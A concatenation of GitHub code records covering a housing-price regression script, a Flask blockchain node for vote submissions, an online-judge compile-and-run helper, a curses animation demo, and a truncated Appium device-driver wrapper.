msg)","repo_name":"alastairmurrant1/DP-Networks-Group-5","sub_path":"RealSnooperServer.py","file_name":"RealSnooperServer.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4677851600","text":"import os\nimport time\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom numpy import Infinity\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import r2_score, mean_absolute_percentage_error\n\n# https://www.kaggle.com/datasets/lildatascientist/raifhackds2021fall\n\n# reform_house_population_1000 - Coefficient of the number of people living within a radius of 1 km by source Reform\n# reform_mean_floor_count_1000 - Average number of storeys of houses within a radius of 1 km according to the source\n# reform_mean_year_building_1000 - Average value of the year of construction of houses within a radius of 1 km\n\nmissing_population = {\n 'Лесозаводск': 35433,\n 'Новопокровка': 3095,\n 'Восток': 3313,\n 'Дальнегорск': 33655,\n 'Дальнереченск': 23613,\n 'Пожарский район, с. Светлогорье, Первый мкр': 1396,\n 'Пластун': 4815,\n 'Лучегорск': 17437,\n 'Пожарский район, Лучегорск пгт': 17437,\n 'Кировский': 8033,\n 'Кировский район, Кировский пгт': 8033,\n 'Горные Ключи': 4302,\n 'Кировский район, Горные Ключи кп': 4302,\n}\n\n\ndef print_features_variance(df):\n for feature in df.columns:\n print(f\"{f'{feature}:':<35}{df[feature].var():>25}\", )\n\n\ndef analyze_variance(train, target):\n print(f'\\n{\" Analyzing Features variance \":.^100}\\n')\n\n print_features_variance(train)\n\n best_error = Infinity\n best_var = 0\n best_features = []\n best_features_to_drop = []\n errors = []\n variances = []\n # vals = [0.001, 0.003, 0.005, 0.1]\n vals = [0, 0.00001, 0.00005, 0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1]\n # vals = [0.01, 0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.09, 0.1]\n # vals = [0.01]\n for var in vals:\n features = train.var()[train.var() > var].index.tolist()\n fearures_to_drop = train.var()[train.var() <= var].index.tolist()\n\n train_x = train[features]\n train_y = target\n\n model = LinearRegression()\n model.fit(train_x, train_y)\n y_pred = model.predict(train_x)\n\n r2 = r2_score(train_y, y_pred)\n print(f'Correlation {var}: {r2}')\n\n error = mean_absolute_percentage_error(train_y, y_pred)\n print(f'MAPE {var}: {error}')\n\n if error < best_error:\n best_error = error\n best_features = features\n best_var = var\n best_features_to_drop = fearures_to_drop\n errors.append(error)\n variances.append(var)\n\n print(f'\\nBest features stat: {best_var} {best_error} - \\n{best_features}')\n print(f'\\nFeatures to drop: {best_features_to_drop}')\n\n plt.plot(variances, errors)\n plt.xlabel('Variance')\n plt.ylabel('MAPE')\n plt.show()\n\n print(f'\\n{\" Analyzing Features variance finished \":.^100}\\n')\n return best_features_to_drop\n\n\ndef correlation(df, threshold):\n col_corr = set()\n corr_matrix = df.corr()\n for i in range(len(corr_matrix.columns)):\n for j in range(i):\n if abs(corr_matrix.iloc[i, j]) > threshold:\n colname = corr_matrix.columns[i]\n col_corr.add(colname)\n return col_corr\n\n\ndef show_nan_statistics(df):\n print('\\nNaN statistics:')\n shape = df.shape[0]\n printed_amount = 0\n for column in df.columns:\n nan_amount = df[column].isna().sum()\n if nan_amount > 0:\n print(f'{column}: {nan_amount} ({nan_amount / shape * 100:.2f}%)')\n printed_amount += 1\n if printed_amount == 0:\n print('No NaN values found')\n print('\\n')\n\n\ndef save_first_n_rows(df, file_name, n=10):\n df.head(n).to_csv(f'./misc/{file_name}', index=False)\n\n\ndef print_current_dir():\n print(os.getcwd())\n\n\ndef print_columns_containing_string_values(df):\n print('\\nColumns containing string values:')\n columns = []\n for column in df.columns:\n if df[column].dtype == 'object':\n print(f'{column}: {len(df[column].unique())}')\n columns.append(column)\n print(f'\\nDate difference: {df[\"date\"].max()}, {df[\"date\"].min()}')\n print(f'Total square difference: {df[\"total_square\"].max()}, {df[\"total_square\"].min()}')\n print('\\n')\n return columns\n\n\ndef add_new_features(df):\n print(f'\\n{\" Adding new features \":*^100}\\n')\n\n df['is_moscow'] = df['region'].apply(lambda x: 1 if x == 'Москва' else 0)\n df['is_spb'] = df['region'].apply(lambda x: 1 if x == 'Санкт-Петербург' else 0)\n df['is_moscow_or_spb_oblast'] = \\\n df['region'].apply(lambda x: 1 if x == 'Московская область' or x == 'Ленинградская область' else 0)\n df['is_krsk_oblast'] = df['region'].apply(lambda x: 1 if x == 'Краснодарский край' else 0)\n df['is_region'] = \\\n df['region'].apply(\n lambda x: 1 if x not in ['Москва', 'Санкт-Петербург', 'Московская область', 'Ленинградская область',\n 'Краснодарский край'] else 0\n )\n df.drop('region', axis=1, inplace=True)\n print(f'\\nIs moscow: {df[\"is_moscow\"].sum()}')\n print(f'Is spb: {df[\"is_spb\"].sum()}')\n print(f'Is moscow or spb oblast: {df[\"is_moscow_or_spb_oblast\"].sum()}')\n print(f'Is krsk oblast: {df[\"is_krsk_oblast\"].sum()}')\n print(f'Is region: {df[\"is_region\"].sum()}\\n')\n\n cities_with_population_more_than_1_million = ['Москва', 'Санкт-Петербург', 'Новосибирск', 'Екатеринбург', 'Казань',\n 'Нижний Новгород', 'Челябинск', 'Самара', 'Омск',\n 'Ростов-на-Дону', 'Уфа', 'Красноярск', 'Воронеж', 'Пермь',\n 'Волгоград']\n df['is_million'] = df['city'].apply(lambda x: 1 if x in cities_with_population_more_than_1_million else 0)\n df['is_not_million'] = df['city'].apply(lambda x: 1 if x not in cities_with_population_more_than_1_million else 0)\n df.drop('city', axis=1, inplace=True)\n print(f'\\nIs million: {df[\"is_million\"].sum()}')\n print(f'Is not million: {df[\"is_not_million\"].sum()}\\n')\n\n df['date'] = pd.to_datetime(df['date'], format='%Y-%m-%d')\n df['year'] = df['date'].dt.year\n df['month'] = df['date'].dt.month\n\n df['date'] = scale_column_min_max(df['date'])\n\n df['total_square'] = scale_column_min_max(df['total_square'])\n\n df = pd.get_dummies(df, columns=['osm_city_nearest_name', 'realty_type'])\n\n print(f'\\n{\" Adding new features finished \":*^100}\\n')\n return df\n\n\ndef scale_column(column):\n return (column - column.mean()) / column.std()\n\n\ndef scale_column_min_max(column):\n return (column - column.min()) / (column.max() - column.min())\n\n\ndef validate_data(df):\n print(f'\\n{\" Validating data... \":*^100}\\n')\n show_nan_statistics(df)\n\n df['street'] = df['street'].fillna('unknown')\n\n df['osm_city_nearest_population'] = df['osm_city_nearest_population'].fillna(df['city'].map(missing_population))\n\n df['missing_reform_stat'] = df['reform_house_population_1000'].apply(lambda x: 1 if pd.isna(x) else 0)\n df['reform_house_population_1000'] = df['reform_house_population_1000'].fillna(4)\n\n df['missing_reform_stat'] = df['reform_mean_floor_count_1000'].apply(lambda x: 1 if pd.isna(x) else 0)\n df['reform_mean_floor_count_1000'] = df['reform_mean_floor_count_1000'].fillna(3)\n\n df['missing_reform_stat'] = df['reform_mean_year_building_1000'].apply(lambda x: 1 if pd.isna(x) else 0)\n df['reform_mean_year_building_1000'] = df['reform_mean_year_building_1000'].fillna(1970)\n\n df['reform_house_population_500'] = df['reform_house_population_500'].fillna(\n df['reform_house_population_1000']\n )\n\n df['reform_mean_floor_count_500'] = df['reform_mean_floor_count_500'].fillna(\n df['reform_mean_floor_count_1000']\n )\n\n df['reform_mean_year_building_500'] = df['reform_mean_year_building_500'].fillna(\n df['reform_mean_year_building_1000']\n )\n\n df['floor'] = df['floor'].fillna(df['reform_mean_floor_count_1000'])\n\n df['total_square_bin'] = pd.qcut(df['total_square'], q=10, labels=False)\n\n df['floor_bin'] = pd.qcut(df['floor'], q=2, labels=False)\n\n df = add_new_features(df)\n\n # show_statistics(df)\n show_nan_statistics(df)\n print(f'\\n{\" Data validation finished \":*^100}\\n')\n return df\n\n\ndef show_column_isna_field_features(df, column, features):\n print(f'\\nCity with nan {column} features: \\n'\n f'{df[df[column].isna()][features].drop_duplicates()}')\n\n\ndef show_statistics(train_df):\n print(f'\\n{\" TABLE statistics \":-^100}')\n\n print(f'\\nNumber of rows: {train_df.shape[0]}')\n print(f'Number of columns: {train_df.shape[1]}')\n\n # show_column_isna_field_features(train_df, 'osm_city_nearest_population', ['city', 'region'])\n\n # show_column_isna_field_features(train_df, 'reform_house_population_1000', ['region'])\n\n # show_column_isna_field_features(train_df, 'reform_mean_floor_count_1000', ['region'])\n\n # show_column_isna_field_features(train_df, 'reform_mean_year_building_1000', ['region'])\n\n # show_column_unique_values_stat(train_df['region'])\n\n string_columns = print_columns_containing_string_values(train_df)\n\n # unique_values_amount(string_columns, train_df)\n\n print('-' * 100)\n return string_columns\n\n\ndef unique_values_amount(string_columns, train_df):\n print(f'\\nNumber of unique values in each column:')\n for column in train_df.columns:\n if column not in string_columns:\n print(f'{column}: {train_df[column].nunique()}')\n\n\ndef show_train_statistics(train):\n print(f'\\n{\" Average per_square_meter_price for each region \":-^100}')\n print(train.groupby('region')['per_square_meter_price'].mean())\n\n\ndef statistics(predicted_price, test):\n test['predicted_price'] = predicted_price\n\n print(f'\\n{\" Regions which have predicted_price more than 200000 and less than 1000000 \":-^100}')\n print(test[(test['predicted_price'] > 200000) & (test['predicted_price'] < 1000000)]['region'].unique())\n\n print(f'\\n{\" Min and max total_squares which have predicted_price more than 200000 and less than 1000000 \":-^100}')\n print(test[(test['predicted_price'] > 200000) & (test['predicted_price'] < 1000000)][\n ['total_square', 'predicted_price']].min())\n print(test[(test['predicted_price'] > 200000) & (test['predicted_price'] < 1000000)][\n ['total_square', 'predicted_price']].max())\n\n\ndef analyze_correlation(train, target):\n print(f'\\n{\" Correlation between features and target \":-^100}')\n\n vals = [0.4, 0.6, 0.7, 0.8, 0.9, 0.95, 0.96, 0.97]\n best_val = 0\n best_error = Infinity\n errors = []\n best_features_to_drop = []\n correlations = []\n for val in vals:\n drop = correlation(train, val)\n\n test_x = train.drop(columns=drop)\n target_y = target\n\n model = LinearRegression()\n model.fit(test_x, target_y)\n\n predict_y = model.predict(test_x)\n\n r2 = r2_score(target_y, predict_y)\n print(f'Correlation {val}: {r2}')\n\n error = mean_absolute_percentage_error(target_y, predict_y)\n print(f'MAPE {val}: {error}')\n\n if error < best_error:\n best_error = error\n best_val = val\n best_features_to_drop = drop\n errors.append(error)\n correlations.append(val)\n\n print(f'\\nBest features stat: {best_val} {best_error} - {best_features_to_drop}')\n\n plt.plot(correlations, errors)\n plt.xlabel('Correlation')\n plt.ylabel('MAPE')\n plt.show()\n\n print(f'\\n{\" Analyzing Features correlation \":.^100}\\n')\n return best_features_to_drop\n\n\ndef correlation_with_target(train, target):\n print(f'\\n{\" Correlation between features and target \":-^100}')\n train.corrwith(target).to_csv('./misc/correlation_with_target.csv', header=True)\n\n drop = train.corrwith(target).abs() < 0.01\n\n drop = list(drop[drop].index)\n\n print(f'\\n{\" Correlation between features and target ended \":.^100}\\n')\n return drop\n\n\ndef replace_outliers_in_column(param):\n param = param.copy()\n q1 = param.quantile(0.05)\n q3 = param.quantile(0.95)\n iqr = q3 - q1\n lower_bound = q1 - 1.5 * iqr\n upper_bound = q3 + 1.5 * iqr\n param.loc[param < lower_bound] = np.nan\n param.loc[param > upper_bound] = np.nan\n param.fillna(param.mean(), inplace=True)\n return param\n\n\ndef replace_outliers_train(train):\n print(f'\\n{\" Replacing outliers for per_square_meter_price \":.^100}')\n\n train['per_square_meter_price'] = train.groupby('region')['per_square_meter_price'].apply(\n lambda x: x.clip(lower=x.quantile(0.05), upper=x.quantile(0.95)))\n\n train['per_square_meter_price'] = train.groupby('osm_city_nearest_name')['per_square_meter_price'].apply(\n lambda x: x.clip(lower=x.quantile(0.05), upper=x.quantile(0.95)))\n\n train['per_square_meter_price'] = train.groupby('total_square')['per_square_meter_price'].apply(\n lambda x: x.clip(lower=x.quantile(0.05), upper=x.quantile(0.95)))\n\n print(f'\\n{\" Replacing outliers for per_square_meter_price ended \":.^100}\\n')\n return train\n\n\ndef replace_outliers(df):\n print(f'\\n{\" Removing outliers \":.^100}')\n\n for column in df.columns:\n if column.startswith('osm_') and df[column].dtype != 'object':\n df[column] = df[column].clip(lower=df[column].quantile(0.05), upper=df[column].quantile(0.95))\n\n for column in df.columns:\n if column.startswith('reform_') and df[column].dtype != 'object':\n df[column] = df[column].clip(lower=df[column].quantile(0.05), upper=df[column].quantile(0.95))\n\n df['total_square'] = df['total_square'].clip(lower=df['total_square'].quantile(0.05),\n upper=df['total_square'].quantile(0.95))\n\n for column in df.columns:\n if column.startswith('osm_') and df[column].dtype != 'object':\n df[column] = np.log1p(df[column])\n\n for column in df.columns:\n if column.startswith('reform_') and df[column].dtype != 'object':\n df[column] = np.log1p(df[column])\n\n print(f'\\n{\" Removing outliers ended \":.^100}\\n')\n return df\n\n\ndef low_variance_stat(train):\n print(f'\\n{\" Low correlation columns \":.^100}')\n for column in train.columns:\n if column != 'per_square_meter_price':\n if train[column].dtype != 'object':\n print(f'{column} correlation with target: {train[column].corr(train[\"per_square_meter_price\"])}')\n\n print(f'\\n{\" Low correlation columns ended \":.^100}\\n')\n\n\ndef main():\n print_current_dir()\n\n predict_target = 'per_square_meter_price'\n\n train = pd.read_csv('./data/train.csv')\n\n train = replace_outliers_train(train)\n\n low_variance_stat(train)\n\n test = pd.read_csv('./data/test_x.csv')\n\n test_copy = test.copy()\n\n target = train[predict_target]\n train.drop(columns=[predict_target], axis=1, inplace=True)\n\n df = pd.concat([train, test], axis=0)\n\n show_statistics(df)\n\n # df.describe().round(2).T.to_csv('./misc/describe_before.csv', header=True)\n\n df = validate_data(df)\n\n df = replace_outliers(df)\n\n # df.describe().round(2).T.to_csv('./misc/describe_after.csv', header=True)\n\n # save_first_n_rows(df, 'df.csv', 100)\n\n string_values = show_statistics(df)\n\n df.drop(columns=string_values, axis=1, inplace=True)\n\n print(f'\\n{\" Predicting... \":.^100}\\n')\n\n train = df.iloc[:len(target)]\n test = df.iloc[len(target):]\n\n drop1 = analyze_variance(train, target)\n df = df.drop(columns=drop1)\n\n # save_first_n_rows(df, 'df.csv', 100)\n\n # drop3 = analyze_correlation(train, target) # testing\n drop2 = list(correlation(df, 0.8))\n print(drop2)\n df = df.drop(columns=drop2)\n\n # train = df.iloc[:len(target)]\n # test = df.iloc[len(target):]\n # drop3 = correlation_with_target(train, target)\n # print(drop3)\n # df = df.drop(columns=drop3)\n\n # save_first_n_rows(df, 'df.csv', 100)\n\n train = df.iloc[:len(target)]\n test = df.iloc[len(target):]\n\n model = LinearRegression()\n model.fit(train, target)\n\n predicted_price = model.predict(test)\n\n statistics(predicted_price, test_copy)\n\n predicted_price_df = pd.DataFrame({'id': range(len(predicted_price)), predict_target: predicted_price})\n\n predicted_price_df[predict_target] = predicted_price_df[predict_target].clip(lower=1)\n\n predicted_price_df.to_csv('./res/predicted_price.csv', index=False)\n\n # hist(predicted_price, target)\n\n print(f'\\n{\" Predicted \":.^100}\\n')\n\n\ndef hist(predicted_price, target):\n predicted_price = np.log1p(predicted_price - predicted_price.min() + 1)\n target = np.log1p(target)\n min_val = min(min(predicted_price), min(target))\n max_val = max(max(predicted_price), max(target))\n plt.hist(predicted_price, bins=100, range=(min_val, max_val), alpha=0.5, label='predicted price')\n plt.hist(target, bins=100, range=(min_val, max_val), alpha=0.5, label='real price')\n plt.legend(loc='upper right')\n plt.title(f'Predicted price and real price histogram plot at {time.strftime(\"%H:%M:%S\")}')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"RuslanZaripov/ITMO","sub_path":"data-analysis/lab-4/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":17508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18870603456","text":"from logging import exception\nfrom block_chain_lab import Block,BlockChain\nfrom flask import Flask,request,render_template,redirect,session \nimport json\nimport requests\nimport time\nfrom flask_cors import CORS,cross_origin\n\n# set a common port for post request coming form other submissin pages \nport = 5000\n\n#this part initialize flask application\n\napp = Flask(__name__)\n# CORS(app)\nCORS(app, resources={r\"/new_transaction/*\": {\"origins\": \"*\"}})\n\n#this part initialize a blockchian object\nblockchian = BlockChain()\n\n\n#this part declars flask endpoint\n@app.route('/new_transaction',methods=['POST'])\n# @cross_origin()\ndef new_transaction():\n tx_data = request.get_json()\n required_field = tx_data\n # print(required_field)\n tx_data1 = json.dumps(tx_data)\n tx_data = json.loads(tx_data1)\n \n for field in required_field:\n if not tx_data.get(field):\n return \"Invalid Transaction\",404\n \n tx_data[\"timestamp\"] = time.time()\n \n blockchian.add_new_transaction(tx_data)\n\n # mine the block\n requests.get(\"http://127.0.0.1:5000/mine\")\n\n # return success\n return \"Success\", 201\n\n # print(required_field)\n # return required_field\n\n#this part is to get the chain of data\n@app.route('/chain',methods=['GET'])\n@cross_origin()\ndef get_chain():\n chain_data = []\n for block in blockchian.chain:\n chain_data.append(block.__dict__)\n return json.dumps({\"lenght\":len(chain_data),\"chain\":chain_data})\n\n#this part is an endpoint to mine transaction\n@app.route('/mine',methods=['GET'])\n@cross_origin()\ndef mine_unconfirmed_transaction():\n result = blockchian.mine()\n if not result:\n return \"No transaction to mine\"\n else:\n chain_length = len(blockchian.chain)\n consensus()\n if chain_length == len(blockchian.chain):\n announce_new_block(blockchian.last_block)\n return \"Block #{} is mined.\".format(blockchian.last_block.index)\n\n#this part checks pending text \n@app.route('/pending_tx')\ndef get_pending_tx():\n return json.dumps(blockchian.unconfirmed_transaction)\n\n\n'''\n This part makes it possible for other nodes \n to be aware or ther peers in the network.\n'''\n\npeers = set()\n\n#This is an endpoint that helps to add new peers to the network\n@app.route('/register_node',methods=['POST'])\n@cross_origin()\ndef register_new_peers():\n node_address = request.get_json()['node_address']\n if not node_address:\n return \"Invalid data\", 400\n \n #Add new peers to the block\n peers.add(node_address)\n \n # Return the blockchain to the newly registered node so that it can sync\n return get_chain()\n\n#this part allows peers to register with new nodes\n@app.route('/register_with',methods=['POST'])\n@cross_origin()\ndef register_with_existing_node():\n node_address = request.get_json()['node_address']\n \n if not node_address:\n return \"Invalid data\",400\n \n data = {'node_adddress':request.host_url}\n headers = {\"Content-Type\":\"application/json\"}\n \n #this part makes a request to register with remote nodes\n response = requests.post(node_address + \"register_node\",data=json.dumps(data),headers=headers)\n \n #this part checks if there is a reponse \n if response.status_code == 200:\n global blockchian\n global peers\n \n #this part updates the block and the peers\n chaim_dump = response.json()['chain']\n blockchian = create_chain_from_dumps(chaim_dump)\n peers.update(response.json()['peers'])\n return \"registration successful\", 200\n \n else:\n return response.content, response.status_code\n\n#this part creates a chain from dumps\ndef create_chain_from_dumps(chain_dump):\n blockchian = BlockChain()\n for idx,block_data in enumerate(chain_dump):\n block = Block(block_data[\"index\"],block_data[\"transaction\"],block_data[\"timestamp\"],block_data['previous_has'])\n prof = block_data['hash']\n if idx >0:\n added = blockchian.add_block(block,prof)\n if not added:\n raise Exception(\"The chain dump is tempared\")\n else:\n blockchian.chain.append(block)\n \n return blockchian\n\n\n \ndef consensus():\n global blockchian \n longest_chain = None\n current_len = len(blockchian.chain)\n \n for node in peers:\n respons = requests.get('{}/chain'.format(node))\n length = respons.json()['length']\n chain = respons.json()['chain']\n if length > current_len and blockchian.check_chain_validity(chain):\n current_len = length\n longest_chain = chain\n if longest_chain:\n blockchian = longest_chain\n return True\n \n return False\n\n#this part provides an endpoint to add mined block to the list of chains\n@app.route('/add_block',methods=['POST'])\n@cross_origin()\ndef verify_and_add_block():\n block_data = request.get_json()\n block = Block(block_data['index'],block_data['transactions'],block_data['timestamp'],block_data['previous_hash'])\n \n prof = block_data['hash']\n added = blockchian.add_block(block,prof)\n if not added:\n return \"The block was discarded by the node\", 400\n \n return \"Block added to the chain\", 201\n\n\n#this function is to announce new block\ndef announce_new_block(block):\n for peer in peers:\n url = \"{}add_block\".format(peer)\n requests.post(url, data=json.dumps(block.__dict__, sort_keys=True))\n\n# #####################################################################################\n# add other routes and code from web_app.py here \n\n\nCONNECTED_NODE_ADDRESS = \"http://127.0.0.1:{}\".format(port)\n\nposts = []\n\n#this function gets the data from the node’s /chain endpoint, parses the data, and stores it locally.\n\ndef fetch_posts():\n \n get_chain_address = \"{}/chain\".format(CONNECTED_NODE_ADDRESS)\n respons = requests.get(get_chain_address)\n if respons.status_code == 200:\n content = []\n chain = json.loads(respons.content)\n for block in chain['chain']:\n for tx in block['transactions']:\n tx['index'] = block['index']\n tx['hash']=block['previous_hash']\n content.append(tx)\n\n# @app.route('/submit',methods=['POST'])\n# @cross_origin()\n# def submit_textarea():\n# region = request.form[\"region\"]\n# constituency = request.form[\"constituency\"]\n# author = request.form[\"author\"]\n# # post_content1 = request.form.get(\"NPP \",\"NPP\")\n# # post_content = request.form.get(\"NDC \",\"NDC\")\n# # username = request.form.get(\"username\",\"username\")\n# party1 = request.form[\"NDC \"]\n# party2 = request.form[\"NPP \"]\n# party1vote= request.form[\"NDC vote_in_number\"]\n# party2vote= request.form[\"NPP vote_in_number\"]\n \n# # post_content = request.form[\"party_name\"]\n# # vote_number= request.form['vote_in_number']\n# # taken out of request form\n# # vote_words= request.form['vote_in_words']\n# rejected_ballot= request.form['rejected_ballot']\n# post_object = {region:{constituency:{author:{party1:party1vote,party2:party2vote,'rejected_ballot':rejected_ballot}}}}\n# # post_object = {'author': author,'party':post_content,'vote_in_number':vote_number,'vote_in_words':vote_words,'rejected_ballot':rejected_ballot,'region':region,\"constituency\":constituency}\n# new_tx_address = \"{}/new_transaction\".format(CONNECTED_NODE_ADDRESS)\n# print(new_tx_address)\n# requests.post(new_tx_address,json=post_object,headers={'Content-type': 'application/json'})\n \n# # pass the region,constituency,polling station in messages in messages stored in sessions \n# url = ('http://127.0.0.1:8000/polling_station/?region={}&constituency={}&ps={}&party1={}&party2={}&r={}').format(region,constituency,author,party1,party2,rejected_ballot) \n\n# # upon submission b ec offical redirect to polling station results page \n# return post_object\n \n\n@app.route('/')\ndef home():\n return render_template('/index.html')\n\n# set a port here to be used by the submission page \n# if __name__ == '__main__':\n# app.run( host='127.0.0.1',port=9000)","repo_name":"Guy-Koliko/final_bc_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7282769497","text":"import subprocess\nimport os\n\n\ndef compile_code(file_path, lang):\n if lang == \"c\":\n compiler = \"gcc\"\n elif lang == \"cpp\":\n compiler = \"g++\"\n elif lang == \"py\":\n return \"Compilation successful\"\n else:\n return \"Compilation Error\"\n\n curr_dir = os.getcwd()\n try:\n os.chdir(\"OJ/waste\")\n compile_file = subprocess.run([compiler, file_path], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n os.chdir(curr_dir)\n stderror = compile_file.stderr.decode(\"utf-8\")\n if stderror == \"\":\n return \"Compilation successful\"\n else:\n return \"Compilation Error\"\n except:\n os.chdir(curr_dir)\n return \"Compilation Error\"\n\n\ndef run_code(lang, ip_data):\n curr_dir = os.getcwd()\n try:\n os.chdir(\"OJ/waste\")\n\n if lang == \"py\":\n result = subprocess.run(\n [\"python\", \"temp.py\"],\n input=ip_data.encode(),\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n timeout=5,\n )\n else:\n result = subprocess.run(\n [\"./a.out\"],\n input=ip_data.encode(),\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n timeout=5,\n )\n os.chdir(curr_dir)\n stdout_output = result.stdout\n stderr_output = result.stderr\n\n if result.returncode != 0:\n raise subprocess.CalledProcessError(\n result.returncode,\n cmd=result.args,\n output=result.stdout,\n stderr=result.stderr,\n )\n return result.stdout.decode(\"utf-8\")\n\n except FileNotFoundError as e:\n os.chdir(curr_dir)\n print(f\"Error: {e.filename} not found.\")\n return \"Error: File not found.\"\n except PermissionError as e:\n os.chdir(curr_dir)\n print(f\"Error: Permission denied for {e.filename}.\")\n return \"Error: Permission denied.\"\n except subprocess.CalledProcessError as e:\n os.chdir(curr_dir)\n print(f\"Error: Command {e.cmd} returned a non-zero exit code {e.returncode}.\")\n print(f\"Standard Output: {e.output}\")\n print(f\"Standard Error: {e.stderr}\")\n return \"Error: Code execution failed.\"\n except subprocess.TimeoutExpired as e:\n os.chdir(curr_dir)\n print(f\"Error: Code execution timed out. {e}\")\n return \"Time Limit Exceeded.\"\n except Exception as e:\n os.chdir(curr_dir)\n print(f\"Error occurred while executing the code: {e}\")\n return \"Error occurred while executing the code.\"\n\n\ndef check_tc(tc, language):\n flag = 1\n j = 0\n idx = 0\n for i in tc:\n j += 1\n result = run_code(language, str(i.tc_input).replace(\" \", \"\\n\"))\n if result == \"Time Limit Exceeded.\":\n return f\"Time Limit Exceeded on tc {j}\"\n result = result.replace(\"\\n\", \"\").replace(\" \", \"\")\n\n if result != i.tc_output:\n flag = 0\n idx = j\n break\n if flag == 0:\n return f\"Wrong Answer on tc {idx}\"\n else:\n return \"Accepted\"\n","repo_name":"ayush1289/online-judge","sub_path":"OJ/compiler.py","file_name":"compiler.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5158801990","text":"import curses\nfrom frame import Frame, FrameModification\nfrom animations import Anim, AnimIterator\nfrom primitives import *\nfrom anim_player import play\n\nfrom random import randint, choice\n\n\n\ndef initialize_curses_colors():\n \"\"\"Initialize the color support of curses (256 colors).\"\"\"\n curses.curs_set(0) # hide the cursor\n curses.start_color()\n curses.use_default_colors()\n # set color_pair for each color\n for i in range(curses.COLORS):\n curses.init_pair(i, i, -1)\n # curses.init_pair(i + 256, i,)\n\ndef screen_saver(fr):\n dot1 = Anim(fr, fadeinout(10, 10, \"•\"))\n dot2 = Anim(fr, fadeinout(10, 11, \"•\"), after=10)\n dot3 = Anim(fr, fadeinout(10, 12, \"•\"), after=20)\n dots = dot1 >> dot2 >> dot3\n play(fr, Anim(fr, dots))\n\ndef main(scr):\n initialize_curses_colors()\n fr = Frame(scr)\n # screen_saver(fr)\n\n # fade_in_out = Anim(fr, fadein(5, 5, \"coucou\")) > Anim(fr, fadeout(5, 5, \"coucou\"))\n\n coucou = Anim(fr, fadein(5, 5, \"coucou\")) >> Anim(fr, fadein(6, 5, \"c'est moi\"))\n coucou2 = Anim(fr, fadein(5, 5, \"coucou\")) >> Anim(fr, fadein(6, 5, \"c'est moi\"))\n hdyd = Anim(fr, fadein(10, 10, \"how do you do ?\"))\n well = Anim(fr, fadein(20, 5, \"je vais well !\"))\n anim = coucou & Anim(fr, coucou)\n\n\n # anim = Anim(fr, addstr(5, 5, \"test\", curses.color_pair(1)))\n play(fr, anim)\n\n\n\nif __name__ == \"__main__\":\n curses.wrapper(main)\n\n\n","repo_name":"OsKaR31415/animations","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30381312513","text":"from uiautomator2 import Device\nfrom executor.appium_driver.UIObjectWrapper import UIObjectWrapper\nimport time\nimport uiautomator2 as u2\nfrom Model.App import App\nfrom Model.Task import Task\nfrom monitor.AndroidEventMonitor import AndroidEventMonitor\nfrom util.ARPPersistence import ARPPersistence\nfrom executor.Executor import ExecutionStrategy\nfrom comparison.StateComparison import StateComparisonStrategy\nfrom functools import wraps\n\nkeycodes = {5: 'call',\n 6: 'endcall',\n 3: 'home',\n 82: 'menu',\n 4: 'back',\n 84: 'search',\n 27: 'camera',\n 80: 'focus',\n 111: 'escape',\n 66: 'enter'}\n\n\n# def dialog_box_handler(func):\n# @wraps(func)\n# def wrap(self, *args, **kwargs):\n# while self.device.info['currentPackageName'] != self.capabilities['appPackage']:\n# if len(self.watchers) == 0:\n# break\n# for watcher in self.watchers:\n# if watcher.triggering:\n# self.current_state = watcher.execute(self.current_state)\n# break\n# return func(self, *args, **kwargs)\n#\n# return wrap\n\n\n# appium脚本执行驱动,用来替代appium自身的driver\nclass AppiumScriptDriver:\n def __init__(self, monitor, device: Device, desired_caps=None):\n self.monitor = monitor\n self.device = device\n self.current_state = None\n self.capabilities = {} if not desired_caps else desired_caps\n\n def implicitly_wait(self, time_to_wait):\n time.sleep(time_to_wait)\n\n def find_element(self, by, elem):\n if elem.exists:\n return UIObjectWrapper(elem, self, by)\n else:\n raise Exception('No such element!')\n\n # @dialog_box_handler\n def find_element_by_id(self, id_):\n # time.sleep(2)\n elem = self.device(resourceId=id_)\n return self.find_element({'resourceId': id_}, elem)\n\n # @dialog_box_handler\n def find_element_by_xpath(self, xpath):\n # time.sleep(2)\n elem = self.device.xpath(xpath)\n return self.find_element({'xpath': xpath}, elem)\n\n # @dialog_box_handler\n def find_elements_by_class_name(self, name):\n elems = self.device(className=name)\n ui_objects = []\n for instance, elem in enumerate(elems):\n ui_object = self.find_element({'className': name, 'instance': instance}, elem)\n ui_objects.append(ui_object)\n return ui_objects\n\n # @dialog_box_handler\n def find_element_by_accessibility_id(self, accessibility_id):\n elem = self.device(description=accessibility_id)\n return self.find_element({'description': accessibility_id}, elem)\n\n # @dialog_box_handler\n def find_element_by_android_uiautomator(self, uia_string):\n uia_string = uia_string.strip()\n if uia_string.startswith('new UiSelector'):\n args = uia_string.split('.')[1:]\n identify = {}\n for arg in args:\n k, v = arg.rtrip(')').split('(')\n v = v.strip('\"')\n identify[k] = v\n elem = self.device(**identify)\n return self.find_element(identify, elem)\n\n def save_screenshot(self, filename):\n self.device.screenshot(filename)\n\n # @dialog_box_handler\n def press_keycode(self, keycode):\n # 由于bug 将code映射为具体的键\n if keycode in keycodes:\n keycode = keycodes[keycode]\n self.device.press(keycode)\n\n # @dialog_box_handler\n def scroll(self, origin_el: UIObjectWrapper, destination_el: UIObjectWrapper, 